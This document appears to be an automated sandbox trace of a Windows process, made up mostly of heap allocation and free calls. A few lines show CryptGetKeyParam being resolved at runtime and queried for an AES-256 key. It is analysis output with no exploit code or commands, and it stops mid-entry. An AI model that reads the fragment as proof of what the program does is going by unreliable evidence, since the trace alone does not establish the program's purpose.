RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0086.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0086.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0086.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0086.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0086.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fe8 [0086.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0086.558] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0086.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0086.559] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2600, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2600*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0086.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0086.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0086.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.561] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.562] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.562] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0086.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, 